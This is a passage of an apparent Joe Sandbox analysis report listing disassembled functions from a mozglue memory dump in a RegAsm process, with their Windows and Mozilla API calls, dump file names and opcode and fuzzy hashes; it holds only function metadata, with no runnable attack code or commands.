                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C141546
                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C1415BA
                                                                                      • free.MOZGLUE(?), ref: 6C1416B4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                      • String ID:
                                                                                      • API String ID: 1909280232-0
                                                                                      • Opcode ID: 7b46597bb5f7ee46284a80b51d87f95252b5abcaf3e76c78beeea8c06887d6eb
                                                                                      • Instruction ID: 190da0a5b7e50f9b6ec760ad2fd88149c3de574388b96e0f19bed583a36f5f3b
                                                                                      • Opcode Fuzzy Hash: 7b46597bb5f7ee46284a80b51d87f95252b5abcaf3e76c78beeea8c06887d6eb
                                                                                      • Instruction Fuzzy Hash: 8961F076A00710DBDB11DF21C880BEABBB0BF8A308F44951CED8A57701DB35E959CB91
                                                                                      APIs
                                                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C13C1F1
                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C13C293
                                                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C13C29E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: fgetc$memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1522623862-0
                                                                                      • Opcode ID: e23c6bbc1cb57eca9ac9c37f8c13a3ef2388009866b488f89a02c2798e42c234
                                                                                      • Instruction ID: 1d474a56de197d0a4937ee31a180e6dbcbbd20449b54a78a538ecbda61fe6a23
                                                                                      • Opcode Fuzzy Hash: e23c6bbc1cb57eca9ac9c37f8c13a3ef2388009866b488f89a02c2798e42c234
                                                                                      • Instruction Fuzzy Hash: 1D61BE71A00234CFCF14DFA8D8A45AEBBB5FF49318F155629E84AA7750C731A944CFA4
                                                                                      APIs
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C139FDB
                                                                                      • free.MOZGLUE(?,?), ref: 6C139FF0
                                                                                      • free.MOZGLUE(?,?), ref: 6C13A006
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C13A0BE
                                                                                      • free.MOZGLUE(?,?), ref: 6C13A0D5
                                                                                      • free.MOZGLUE(?,?), ref: 6C13A0EB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                      • String ID:
                                                                                      • API String ID: 956590011-0
                                                                                      • Opcode ID: 4753309b5f0fa57515e7fb90abc0af96e1d2fd52de1a2aa9efd2cbe3513a92c6
                                                                                      • Instruction ID: 26e8980a37d3a3aeb4193dce09d5294445242994ef4d8d1a0a4f27a3391458c0
                                                                                      • Opcode Fuzzy Hash: 4753309b5f0fa57515e7fb90abc0af96e1d2fd52de1a2aa9efd2cbe3513a92c6
                                                                                      • Instruction Fuzzy Hash: 6261D1755087119FC711CF58C48069AB3F5FF88328F549669E8999B702EB32E986CBC1
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13DC60
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C13D38A,?), ref: 6C13DC6F
                                                                                      • free.MOZGLUE(?,?,?,?,?,6C13D38A,?), ref: 6C13DCC1
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C13D38A,?), ref: 6C13DCE9
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C13D38A,?), ref: 6C13DD05
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C13D38A,?), ref: 6C13DD4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                      • String ID:
                                                                                      • API String ID: 1842996449-0
                                                                                      • Opcode ID: 1f5888d54c216e4b78721edf23b7b33097f44378eaf6934073ff0ea59d72376a
                                                                                      • Instruction ID: c1cbee51e1d90e4f44b3e72ecf59a102a4f74a5a56616f2ecc29b27abe7bfdf9
                                                                                      • Opcode Fuzzy Hash: 1f5888d54c216e4b78721edf23b7b33097f44378eaf6934073ff0ea59d72376a
                                                                                      • Instruction Fuzzy Hash: CF419DB5A00215CFCB00DF99C880A9AB7F6FF88318B555469E949ABB11DB31FC00CB90
                                                                                      APIs
                                                                                        • Part of subcall function 6C11FA80: GetCurrentThreadId.KERNEL32 ref: 6C11FA8D
                                                                                        • Part of subcall function 6C11FA80: AcquireSRWLockExclusive.KERNEL32(6C16F448), ref: 6C11FA99
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C126727
                                                                                      • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C1267C8
                                                                                        • Part of subcall function 6C134290: memcpy.VCRUNTIME140(?,?,6C142003,6C140AD9,?,6C140AD9,00000000,?,6C140AD9,?,00000004,?,6C141A62,?,6C142003,?), ref: 6C1342C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                      • String ID: data
                                                                                      • API String ID: 511789754-2918445923
                                                                                      • Opcode ID: 3658602acdec10c7069f01b615a1c09f9c7a2567b5cd85f7206dd444670bbab2
                                                                                      • Instruction ID: 8fc7d108316206138adb0506c2d4e09f3a48fb3f6b1c27c3c2abaeb806fd24b9
                                                                                      • Opcode Fuzzy Hash: 3658602acdec10c7069f01b615a1c09f9c7a2567b5cd85f7206dd444670bbab2
                                                                                      • Instruction Fuzzy Hash: 8CD10179A083408FD720DF25C841B9FB7E5AFD5308F10492DE599D7B90DB34A889CB52
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000001), ref: 6C12CA57
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C12CA69
                                                                                      • Sleep.KERNEL32 ref: 6C12CADD
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C12CAEA
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C12CAF5
                                                                                      • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C12CB19
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
                                                                                      • String ID:
                                                                                      • API String ID: 432163150-0
                                                                                      • Opcode ID: dd16000167526067954cffcd27567d4ddc6f77a8783b02702238d8cd65d591bd
                                                                                      • Instruction ID: f037a4fcff370257748fc4472b71b0e7a955346cd862192dd12cf49d45f48a4d
                                                                                      • Opcode Fuzzy Hash: dd16000167526067954cffcd27567d4ddc6f77a8783b02702238d8cd65d591bd
                                                                                      • Instruction Fuzzy Hash: 2D213771B046488BD708EF38886526BF7BAFFC6344F408628E945A6680FF74D5888B81
                                                                                      APIs
                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C13C82D
                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C13C842
                                                                                        • Part of subcall function 6C13CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C15B5EB,00000000), ref: 6C13CB12
                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C13C863
                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C13C875
                                                                                        • Part of subcall function 6C11B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C15B636,?), ref: 6C11B143
                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C13C89A
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C13C8BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                      • String ID:
                                                                                      • API String ID: 2745304114-0
                                                                                      • Opcode ID: fc95f752ba369d6c6e5ca238426809999ac2f9e550b9c81d8cc42747f68f9697
                                                                                      • Instruction ID: 19829d3b585598f7cc6838b8dea7a43651dfdfc59613ce6c243f666fda89fea1
                                                                                      • Opcode Fuzzy Hash: fc95f752ba369d6c6e5ca238426809999ac2f9e550b9c81d8cc42747f68f9697
                                                                                      • Instruction Fuzzy Hash: 23118675B002159BCB00DFA5C8999BE7B75FF89358F000169E90697741DB309D18EBA1
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C0EEB57,?,?,?,?,?,?,?,?,?), ref: 6C11D652
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C0EEB57,?), ref: 6C11D660
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C0EEB57,?), ref: 6C11D673
                                                                                      • free.MOZGLUE(?), ref: 6C11D888
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$memsetmoz_xmalloc
                                                                                      • String ID: |Enabled
                                                                                      • API String ID: 4142949111-2633303760
                                                                                      • Opcode ID: 4cb95d8ed9acba316380679b92283aa5e2524c2417264ae0651876a675aa4bad
                                                                                      • Instruction ID: 43d6fce3df63b8ddbb5ceff7e112917ff94b861f2eafbceec437715edb1f0801
                                                                                      • Opcode Fuzzy Hash: 4cb95d8ed9acba316380679b92283aa5e2524c2417264ae0651876a675aa4bad
                                                                                      • Instruction Fuzzy Hash: 0AA128B0A083448FDB12DF69C4D07EEBBF1AF59318F14806CD8956BB41D739A946CBA1
                                                                                      APIs
                                                                                      • free.MOZGLUE(?), ref: 6C130270
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C1302E9
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1302F6
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C13033A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                      • String ID: about:blank
                                                                                      • API String ID: 2047719359-258612819
                                                                                      • Opcode ID: 5082a6998f0f6c550a763b6ca153707e399ade4186f4d4c06240d3a163f3c4c7
                                                                                      • Instruction ID: 115b6f1ae03e51a1c5cbf24ad6c8c843161b3ad0e59db7d52efe1a9924eb7953
                                                                                      • Opcode Fuzzy Hash: 5082a6998f0f6c550a763b6ca153707e399ade4186f4d4c06240d3a163f3c4c7
                                                                                      • Instruction Fuzzy Hash: 6151C271A00229CFCB00DF59C480AAAB7F5FF49318F245519D82AA7B41D731FD46CB94
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12E12F
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C12E084,00000000), ref: 6C12E137
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C12E196
                                                                                      • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C12E1E9
                                                                                        • Part of subcall function 6C1299A0: GetCurrentThreadId.KERNEL32 ref: 6C1299C1
                                                                                        • Part of subcall function 6C1299A0: AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1299CE
                                                                                        • Part of subcall function 6C1299A0: ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1299F8
                                                                                      Strings
                                                                                      • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6C12E13F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                      • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                      • API String ID: 2491745604-3904374701
                                                                                      • Opcode ID: 19453db3f4851daace5387c213e163de6eecb9405360a2a4199846fbec0cd30f
                                                                                      • Instruction ID: 7dc13b2431aa835da4d0131073c63ab9f0f242b1dc8cfc3441fbcd9778602d9b
                                                                                      • Opcode Fuzzy Hash: 19453db3f4851daace5387c213e163de6eecb9405360a2a4199846fbec0cd30f
                                                                                      • Instruction Fuzzy Hash: 453139B56043009FC700EF2985013AAF7E5AFDA30CF50842DE8655BB41DB74D989C793
                                                                                      APIs
                                                                                      • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C11F480
                                                                                        • Part of subcall function 6C0EF100: LoadLibraryW.KERNEL32(shell32,?,6C15D020), ref: 6C0EF122
                                                                                        • Part of subcall function 6C0EF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0EF132
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 6C11F555
                                                                                        • Part of subcall function 6C0F14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C0F1248,6C0F1248,?), ref: 6C0F14C9
                                                                                        • Part of subcall function 6C0F14B0: memcpy.VCRUNTIME140(?,6C0F1248,00000000,?,6C0F1248,?), ref: 6C0F14EF
                                                                                        • Part of subcall function 6C0EEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C0EEEE3
                                                                                      • CreateFileW.KERNEL32 ref: 6C11F4FD
                                                                                      • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C11F523
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                      • String ID: \oleacc.dll
                                                                                      • API String ID: 2595878907-3839883404
                                                                                      • Opcode ID: 8a8f10a2d7acdd7afffee24bc1cd8c1caeebfb0b23f53e60980e1784171697c3
                                                                                      • Instruction ID: 37c491e82e961ad46ee22ab7d3a5032c209b99a35d014cdfbc9bf7ff5830d64b
                                                                                      • Opcode Fuzzy Hash: 8a8f10a2d7acdd7afffee24bc1cd8c1caeebfb0b23f53e60980e1784171697c3
                                                                                      • Instruction Fuzzy Hash: 1141A070608710DFE760DF29C884B9BB7F4AF95318F500A2CF5A183A50EB34E949CB92
                                                                                      APIs
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C120222
                                                                                      • moz_xmalloc.MOZGLUE(0000000C), ref: 6C120231
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C12028B
                                                                                      • RtlFreeHeap.NTDLL ref: 6C1202F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
                                                                                      • String ID: @
                                                                                      • API String ID: 2782572024-2766056989
                                                                                      • Opcode ID: 3a8902144aae1ab62412a80a53f5c050c3c9632641c53c1d1c116581bd0aafae
                                                                                      • Instruction ID: 416554bb7b513c4b792bb8b8814c9889f310535dce1cf67fc53e6dc4f0ee78e3
                                                                                      • Opcode Fuzzy Hash: 3a8902144aae1ab62412a80a53f5c050c3c9632641c53c1d1c116581bd0aafae
                                                                                      • Instruction Fuzzy Hash: B131DDB5A002108FEB54CF59C890B2AB7F1FF54318B24862ED96ADBB40D734EC81CB90
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12E047
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12E04F
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C12E09C
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C12E0B0
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_get_profile, xrefs: 6C12E057
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                      • String ID: [I %d/%d] profiler_get_profile
                                                                                      • API String ID: 1832963901-4276087706
                                                                                      • Opcode ID: b3443e069bf9dd5926827d712216a6a04e7fe67f39b1d5f6784272b5866740a1
                                                                                      • Instruction ID: 5b27e84695aa292446712a2cea236362cecadd02ba0099138afd3ee7328ef179
                                                                                      • Opcode Fuzzy Hash: b3443e069bf9dd5926827d712216a6a04e7fe67f39b1d5f6784272b5866740a1
                                                                                      • Instruction Fuzzy Hash: A921C278B001488FDF04DF75C858AAEBBB5AF45209F144029ED0A97741DB39EA4AC7E5
                                                                                      APIs
                                                                                      • SetLastError.KERNEL32(00000000), ref: 6C147526
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C147566
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C147597
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
